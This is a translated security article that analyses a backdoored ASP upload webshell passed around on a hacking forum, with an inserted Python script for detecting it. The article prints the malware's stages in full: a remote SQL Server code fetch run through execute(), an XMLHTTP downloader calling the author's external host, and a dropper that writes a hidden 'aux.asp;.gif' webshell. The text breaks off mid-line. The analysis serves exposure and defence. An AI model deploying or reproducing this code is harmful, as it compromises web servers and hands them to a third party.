A backdoor-hunting tour through an "advanced" pony script

Source: Internet
Author: User
Tags: servervariables

Author: New4
It began on our Dark Group forum, where I came across a post titled "A must-have for hacking sites: powerful, stealthy backdoor, ASP invincible uploader". Someone had replied asking what a domain name in the code was for. Out of curiosity I downloaded the file and read it.
Figure 1: the forum post

You do not know until you look, and one look gave me a shock: this script is not only "advanced", it also carries a backdoor!
Why advanced? Because it uses tricks I had never seen before: SQL Server + Microsoft.XMLHTTP + a disguised 404 error page, so that the real code is fetched remotely and dynamically and executed in several stages. If the user calls the pony (小马, a small upload webshell) incorrectly, it returns a page that looks like a 404 error while actually answering with HTTP 200. The person who uploaded it then believes the pony has been killed, which gives the backdoor's author his chance to use it; at least the uploader will not do him the favour of deleting it. How to call it correctly is covered below.

Below is the pony backdoor as provided by its author:
<% password = "123456" %>   (here 123456 is replaced with your password; the password may contain only letters or digits)
<% ' "Invincible uploader" (decorative text in the original, one character per tag) %>
<% BY01 = "hmserver" %>
<% BY02 = "8866" %>
<% BY03 = "org" %>
<% BYJH = "." %>
<% CODE = "888" %>
<% BYLJ1 = "provider=sqloledb;" %>
<% BYLJ2 = "server=" & BY01 & BY01 & BY02 & BYJH & BY03 & ";" %>
<% BYLJ3 = "uid=" & CODE & ";" %>
<% BYLJ4 = "pwd=" & CODE & ";" %>
<% BYLJ5 = "database=" & CODE & ";" %>
<% Set amconn = Server.CreateObject("ADODB.Connection") %>
<% amconn.open BYLJ1 & BYLJ2 & BYLJ3 & BYLJ4 & BYLJ5 %>
<% sqlam = "select * from code" %>
<% Set rsam = amconn.execute(sqlam) %>
<% amtxt = rsam("txt") %>
<% amtxt = replace(amtxt, "amsql=""password""", "amsql=""" & password & """") %>
<% execute(amtxt) %>
<% rsam.close %>
<% Set rsam = nothing %>
<% amconn.close %>
<% Set amconn = nothing %>

Look closely at the domain name in the code above; it is what drew the questions in the forum post (it sits there in plaintext, far too obvious). To tell whether the script performs a database operation, we only need to look for "ADODB.Connection" or "select * from code": the former creates an ADO connection to the database, the latter is the SQL statement that queries it. So the next question is: how do we get at the final secret, the code stored in that database?
There are two ways. 1. Run packet-capture software on the server and execute the ASP page, then read the plaintext from the capture. 2. Use SQL Query Analyzer to connect to the server and run the SQL query yourself. As Figures 2 and 3 show, the login, password and database name are all 888. The text copied from Query Analyzer was incomplete, probably because of the column's data type, which Query Analyzer cannot display in full; SQL Enterprise Manager shows it whole. If that is too much trouble, or you do not have a full SQL Server installation, take the first route: any sniffer will do for capturing the packets, and the transmitted code is visible in them (Figure 4). Its advantage is that it is portable and leaves nothing installed.
Figure 2: connecting to SQL Server
Figure 3: executing the SQL statement
Figure 4: the captured packets
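As an added example (not code from the article or its author), here is a small Python triage script that applies the checks described above to an ASP file without running it: it counts the indicators the text names, rebuilds the connection string that the pony splits into fragments so the server name becomes readable, and flags the combination of a remote code source with a bare Execute. The two sample pages and the host c2host.example.invalid are constructed placeholders.

```python
import re
# Added example for this article (not the author's tooling): flag the backdoor
# indicators the text names (ADODB.Connection to a remote SQL Server, "select *
# from code", XMLHTTP fetch, bare Execute(...) of fetched text, as opposed to the
# ordinary conn.execute(sql) method) and re-assemble connection strings that
# were split into fragments (BY01 & BYJH & BY02 ...) to keep the host out of grep.
INDICATORS = {
    "ado_connection":  re.compile(r"ADODB\.Connection", re.I),
    "code_from_table": re.compile(r"select\s+\*\s+from\s+code", re.I),
    "xmlhttp_fetch":   re.compile(r"MSXML2\.ServerXMLHTTP|Microsoft\.XMLHTTP", re.I),
    "dynamic_execute": re.compile(r"(?<![.\w])(?:Execute|ExecuteGlobal|Eval)\s*\(", re.I),
}
ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")
STR_EXPR = re.compile(r'(?:"(?:[^"]|"")*"|\w+)(?:\s*&\s*(?:"(?:[^"]|"")*"|\w+))*')
TOKEN = re.compile(r'"((?:[^"]|"")*)"|(\w+)')
def resolve_strings(source):
    """Evaluate VBScript lines of the form  name = "lit" & other & ...  and return
    {lowercased name: plaintext}; names never assigned a string stay as <name>."""
    env = {}
    for line in re.sub(r"<%|%>", "", source).splitlines():
        m = ASSIGN.match(line)
        if not m or not STR_EXPR.fullmatch(m.group(2)):
            continue                      # Set x = CreateObject(...), calls, etc.
        value = ""
        for lit, ident in TOKEN.findall(m.group(2)):
            value += env.get(ident.lower(), f"<{ident}>") if ident else lit.replace('""', '"')
        env[m.group(1).lower()] = value
    return env
def scan_asp(source):
    """Indicator hit counts, recovered server/URL strings and a verdict."""
    hits = {name: len(rx.findall(source))
            for name, rx in INDICATORS.items() if rx.search(source)}
    hits["recovered"] = sorted(v for v in resolve_strings(source).values()
                               if re.search(r"server\s*=|https?:|(?:\w+\.){2}\w{2,}", v, re.I))
    # A remote code source plus dynamic execute is the backdoor signature itself.
    fetch = "ado_connection" in hits or "xmlhttp_fetch" in hits
    hits["verdict"] = "backdoor" if fetch and "dynamic_execute" in hits else "clean"
    return hits
# Constructed samples: one shaped like the pony above (placeholder host), one benign.
SAMPLE_PONY = """<% BY01 = "c2host" %>
<% BY02 = "example" %>
<% BY03 = "invalid" %>
<% BYJH = "." %>
<% BYLJ2 = "server=" & BY01 & BYJH & BY02 & BYJH & BY03 & ";" %>
<% Set amconn = Server.CreateObject("ADODB.Connection") %>
<% Set rsam = amconn.execute("select * from code") %>
<% execute(rsam("txt")) %>"""
SAMPLE_BENIGN = """<% Set conn = Server.CreateObject("ADODB.Connection") %>
<% Set rs = conn.execute("select name from products") %>"""
```

The benign page also opens an ADO connection, so the verdict rests on the fetched-then-executed pattern rather than on ADO alone.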

The code recovered from the captured packets is as follows:
amsql = "password"
BY01 = "http"
BY02 = "hmserver"
BY03 = "8800"
BY04 = "org"
BYXG = "/"
BYJH = "."
BYMH = ":"
BYQZ = "SQL_"
BYHZ = "SC.txt"
BYDK = "888"
BYURL = BY01 & BYMH & BYXG & BY02 & BYJH & BY03 & BYJH & BY04 & BYMH & BYDK & BYXG & BYQZ & BYHZ
Set amxml = Server.CreateObject("MSXML2.ServerXMLHTTP")
amxml.open "GET", BYURL, false
amxml.send()
amtxt = amxml.responseText
amtxt = replace(amtxt, "amsc=""password""", "amsc=""" & password & """")

The execute(amtxt) that follows in the code above adds nothing new: this stage is only a downloader that fetches the next piece of code via XMLHTTP. So we go on to SQL_SC.txt, whose code is:
amsc = "password"
BYAM = "http://hmserver.8800.org:888/hk_"
Function GetUrl()
    ScriptAddress = CStr(Request.ServerVariables("SCRIPT_NAME"))
    Servername = CStr(Request.ServerVariables("Server_Name"))
    findfilename = right(ScriptAddress, len(ScriptAddress) - InStrRev(ScriptAddress, "/"))
    GetUrl = "http://" & Servername & ScriptAddress
    GetUrl = replace(GetUrl, findfilename, "")
End Function
Function GetBody(Url)
    Dim objXML
    On Error Resume Next
    Set objXML = CreateObject("Microsoft.XMLHTTP")
    With objXML
        .Open "Get", Url, False, "", ""
        .Send
        GetBody = .ResponseBody
    End With
    GetBody = BytesToBstr(GetBody, "GB2312")
    Set objXML = Nothing
End Function
Function BytesToBstr(strBody, CodeBase)
    Dim objStream
    Set objStream = Server.CreateObject("Adodb.Stream")
    objStream.Type = 1
    objStream.Mode = 3
    objStream.Open
    objStream.Write strBody
    objStream.Position = 0
    objStream.Type = 2
    objStream.Charset = CodeBase
    BytesToBstr = objStream.ReadText
    objStream.Close
    Set objStream = nothing
End Function
Function WriteFile(StrContent, Foldername, fileExt, fname)
    Dim myfos, TheFile, Filename, TheFolder, ThefileExt
    Set myfos = Server.CreateObject("Scripting.FileSystemObject")
    TheFolder = "./"
    ThefileExt = ".txt"
    If Foldername <> "" Then TheFolder = Foldername
    If ThefileExt <> "" Then ThefileExt = fileExt
    TheFolder = Server.MapPath(TheFolder)
    If myfos.FolderExists(TheFolder) = False Then
        myfos.CreateFolder(TheFolder)
    End If
    If fname = "" Then
        Filename = Replace(Cstr(time()), ":", ".")
    Else
        Filename = fname
    End If
    TheFile = "\." & TheFolder & "\" & Filename & ThefileExt
    Set fs = Server.CreateObject("Scripting.FileSystemObject")
    If fs.FileExists(TheFile) then
        Response.write "<script>self.location=""" & GetUrl & fname & fileext & "?password=" & amsc & """;</script>"
    Else
        Set ff = fs.CreateTextFile(TheFile)
        Set ff = nothing
        Response.write "<script>self.location=""" & GetUrl & fname & fileext & "?password=" & amsc & """;</script>"
    End If
    Set f = fs.GetFile(TheFile)
    f.Attributes = 0
    Set mytxt = myfos.OpenTextFile(TheFile, 2, True)
    mytxt.Write StrContent
    f.Attributes = 1 + 2 + 4
    If err.number <> 0 Then
        WriteFile = 0
    End If
    mytxt.close
    Set f = nothing
    Set fs = nothing
    Set myfos = nothing
    Set mytxt = nothing
End Function
aux = GetBody(BYAM & "asp.txt")
aux = replace(aux, "amasp=""password""", "amasp=""" & amsc & """")
Call WriteFile(aux, "", ".gif", "aux.asp;")
scname = Request.ServerVariables("script_name")
Postion = InStrRev(scname, "/") + 1
scname = Mid(scname, pos
